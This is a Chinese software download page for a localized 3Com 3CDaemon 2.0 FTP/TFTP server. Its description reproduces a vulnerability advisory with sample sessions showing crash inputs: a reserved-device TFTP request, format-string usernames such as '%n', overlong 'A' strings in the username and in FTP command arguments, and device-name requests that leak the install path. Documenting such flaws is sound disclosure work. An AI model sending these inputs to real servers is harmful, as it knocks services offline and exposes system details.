不用我说了吧,3com的这款东西还是很有名很不错滴~~~3CDaemon是一款免费的集成了TFTP、FTP和SYSLOG功能的应用程序。作用:FTP,TFTP,SYSLOG服务器,TFTP客户端 3CDaemon存在多个安全问题,远程攻击者可以利用这些漏洞进行拒绝服务、格式串及缓冲区溢出等攻击。 1、TFTP保留设备名拒绝服务攻击: 提交类似如下的请求,可导致TFTP服务程序挂起: D:WINDOWSsystem32>tftp -i 192.168.0.1 get prn The 3CDaemon will be crashed with some msgs like "Microsoft Visual C++ Runtime library" "Runtime Error!" "Program : C:Program Files3Com3CDaemon3CDaemon.exe " "abnormal program termination". 2、FTP用户名存在格式串问题: 提交包含格式串字符作为用户名数据,可导致守护程序崩溃: H:>ftp 192.168.0.1 Connected to 192.168.0.1. 220 3Com 3CDaemon FTP Server Version 2.0 User (192.168.0.1:(none)): %n Connection closed by remote host. OR: H:>ftp 192.168.0.1 Connected to 192.168.0.1. 220 3Com 3CDaemon FTP Server Version 2.0 User (192.168.0.1:(none)): %s 331 User name ok, need password Password:[anythinghere] 530 Login access denied Login failed. ftp> 3、FTP超长用户名缓冲区溢出 由于对用户名缺少正确边界缓冲区检查,提交超长用户名可导致缓冲区溢出: D:WINDOWSsystem32>ftp 192.168.0.1 Connected to 192.168.0.1. 220 3Com 3CDaemon FTP Server Version 2.0 User (192.168.0.1:(none)): 501 Invalid or missing parameters Login failed. ftp> user AAA..[about 241 A here]...AAAAA Connection closed by remote host. 4、多个FTP命令超长参数缓冲区溢出: cd,send,ls,,put,delete,rename,rmdir,literal,stat,CWD等FTP命令对参数缺少充分边界检查,提交超长字符串作为命令参数可导致缓冲区溢出: ftp> cd AAA..[about 398 A here]...AAAAA Connection closed by remote host. ftp> ftp> ls AAA..[about 247 A here]...AAAAA 200 PORT command successful. Connection closed by remote host. ftp> put 1.txt AAA..[about 247 A here]...AAAAA 200 PORT command successful. 532 Need account for storing files Connection closed by remote host. 5、多个FTP命令存在格式串问题 提交格式字符串作为参数,可导致程序崩溃。 6、多个FTP命令包设备名信息泄露问题 请求保留设备名可导致返回程序安装路径信息: ftp> cd aux 550 aux : C:/3cdaemon/aux is not a directory! ftp> cd lpt1 550 lpt1 : C:/3cdaemon/lpt1 is not a directory! 受影响系统: 3Com 3CDaemon 2.0 revision 10
- 3COM 3CDaemon 2.0 汉化免安装版
- 运行环境:WinXP, WinAll
软件语言:中文
软件类型:汉化软件 - 网络软件 - FTP 工具 - FTP 工具01
授权方式:免费软件
软件大小:241 KB
推荐星级:
更新时间:2019-1-9 9:26:41
联系方式:暂无联系方式
官方主页:Home Page
图片预览:
插件情况:
解压密码:本站无密码或见首页公告
下载统计:
